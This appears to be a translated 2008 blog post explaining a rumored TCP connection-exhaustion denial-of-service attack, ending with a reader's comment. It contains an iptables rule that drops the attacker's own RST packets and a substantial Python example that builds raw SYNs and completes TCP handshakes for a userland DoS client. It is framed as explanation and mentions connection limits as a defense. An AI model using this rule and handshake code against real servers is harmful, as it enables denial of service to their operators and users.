Category: Network and Security

2008-11-08 22:52:10

Recently two people in Sweden have been making a lot of noise about something, but they have never given any concrete details; based on their interviews, people guess it is a DoS attack that was already known. A discussion on the nmap mailing list:
http://insecure.org/stf/tcp-dos-attack-explained.html

Basic idea:

The basic idea is to first firewall your source address(es) using a command such as iptables (on Linux) to prevent your own OS from interfering with your attack. Next you create hundreds or thousands of connections to the TCP port you are targeting (such as port 80 of a web server) as follows:

  1. Attacker sends a TCP SYN packet to the target port from his own IP address (or one he controls) to request a connection.
  2. The target port is open, so it will respond with a SYN/ACK packet—the 2nd step of the 3-way handshake. Remember that Attacker sent the SYN as a raw packet from userland rather than using his operating system's connect() API to establish the connections. So when Attacker's operating system's TCP stack sees the unexpected SYN/ACK come back, it would normally destroy the nascent connection by sending a reset (RST) packet. This is why the special firewall rule was mentioned—to prevent such interference by Attacker's OS. Instead Attacker's DoS client handles all these packets by sniffing them from userland (generally using libpcap) and building/sending the raw reply packets.
  3. Using the initial sequence number and other information from the SYN/ACK, Attacker sends an acknowledgment packet (the final step of the 3-way handshake) to complete the connection.
In practice this comes down to raw sockets: the connections are never handed to the local TCP stack, so the attacker keeps no per-connection state, and the RSTs the local stack would send are dropped on the local firewall. Note that the RST Linux emits in reply to an unexpected SYN/ACK carries no ACK flag (RFC 793: when the incoming segment has ACK set, the reset takes its sequence number from that ACK field and is sent without ACK), so a mask of ACK,RST would let it through; match on RST alone and, so the attacker's own other connections keep working, scope the rule to the target address (TARGET_IP is a placeholder here):
#iptables -A OUTPUT -p tcp -d TARGET_IP --tcp-flags RST RST -j DROP
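The three steps above, as an added example that is not code from the original post or from the nmap thread. It shows the only piece of TCP a userland DoS client has to implement: take a sniffed SYN/ACK, check that it really answers one of our raw SYNs, and build the final ACK with the right sequence and acknowledgment numbers and a valid checksum. Pure standard-library Python on byte strings; no packets are sent, the addresses, ports and ISNs are assumed values, the SYN/ACK is constructed in place of a captured one, IPv4 without TCP options is assumed, and the libpcap sniffing, raw-socket sending and the firewall rule are outside the block.

```python
import struct

# Illustrative endpoints; these addresses and ports are assumptions, not from the page.
ATTACKER_IP = "10.0.0.2"
TARGET_IP = "10.0.0.1"
TARGET_PORT = 80

TH_FIN, TH_SYN, TH_RST, TH_PSH, TH_ACK = 0x01, 0x02, 0x04, 0x08, 0x10
TCP_HDR = "!HHIIBBHHH"  # sport, dport, seq, ack, data offset/reserved, flags, window, csum, urg


def ip_bytes(addr):
    return bytes(int(o) for o in addr.split("."))


def checksum(data):
    """RFC 1071 ones'-complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def pseudo_header(src_ip, dst_ip, tcp_len):
    return ip_bytes(src_ip) + ip_bytes(dst_ip) + struct.pack("!BBH", 0, 6, tcp_len)


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, window=65535):
    """20-byte TCP header without options, checksum filled in."""
    hdr = struct.pack(TCP_HDR, sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    csum = checksum(pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def parse_tcp(segment):
    sport, dport, seq, ack, off, flags, window, csum, _ = struct.unpack(TCP_HDR, segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "doff": off >> 4, "flags": flags, "window": window, "csum": csum}


def checksum_ok(src_ip, dst_ip, segment):
    """A correct segment sums to zero when the checksum field is included."""
    return checksum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def make_syns(attacker_ip, target_ip, target_port, sports, isn_base=1000):
    """Raw SYNs for many source ports. The client's only state is {sport: isn};
    the target will hold a full socket for every one of these that completes."""
    pending, syns = {}, []
    for i, sp in enumerate(sports):
        isn = (isn_base + i * 0x10000) & 0xFFFFFFFF
        pending[sp] = isn
        syns.append(build_tcp(attacker_ip, target_ip, sp, target_port, isn, 0, TH_SYN))
    return pending, syns


def complete_handshake(pending, synack, target_ip, attacker_ip):
    """Given a sniffed SYN/ACK, return the final ACK bytes, or None if the
    segment is not a valid answer to one of our SYNs (a RST for a closed port,
    a corrupted segment, or a SYN/ACK for a port we never used)."""
    if len(synack) < 20:
        return None
    h = parse_tcp(synack)
    our_isn = pending.get(h["dport"])
    if our_isn is None:
        return None
    if h["flags"] & (TH_SYN | TH_ACK | TH_RST) != (TH_SYN | TH_ACK):
        return None
    if h["ack"] != (our_isn + 1) & 0xFFFFFFFF:
        return None  # does not acknowledge our ISN
    if not checksum_ok(target_ip, attacker_ip, synack):
        return None
    # Third step of the handshake: our seq advances past the SYN, we ack their ISN + 1.
    return build_tcp(attacker_ip, target_ip, h["dport"], h["sport"],
                     (our_isn + 1) & 0xFFFFFFFF, (h["seq"] + 1) & 0xFFFFFFFF, TH_ACK)


if __name__ == "__main__":
    pending, syns = make_syns(ATTACKER_IP, TARGET_IP, TARGET_PORT, range(40000, 40010))
    # Constructed SYN/ACK, as the target would answer the SYN sent from port 40000.
    synack = build_tcp(TARGET_IP, ATTACKER_IP, TARGET_PORT, 40000, 0x12345678,
                       pending[40000] + 1, TH_SYN | TH_ACK)
    ack = complete_handshake(pending, synack, TARGET_IP, ATTACKER_IP)
    print(parse_tcp(ack))
```

The asymmetry the attack relies on is visible in make_syns: the client remembers one 32-bit ISN per source port, while the target allocates a full socket for every completed handshake. The checks in complete_handshake are the ones a real client needs because everything on the wire, including RSTs from closed ports and stray SYN/ACKs, arrives on the same sniffer.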

In that way a single machine can hold roughly 60,000 connections to the target (one per local source port; the 16-bit port space caps it at 65,535 per source address), and the target has to keep a full socket's worth of state for every one of them, which ties up a lot of resources.

The simplest defense against this attack is to limit the number of connections (per source address; a global cap would itself be the denial of service), although that is a bit dirty ;-)

Still, better to wait until 2009, when the two of them publish their research. Keyword: New Denial-of-Service Attack Is a Killer

chinaunix netizen 2009-05-24 19:54:42

To this day the details still have not been published; it may not be as simple as you say, since what you describe is no different from a synflood; I think it may have something to do with the syn-cookie implementation.
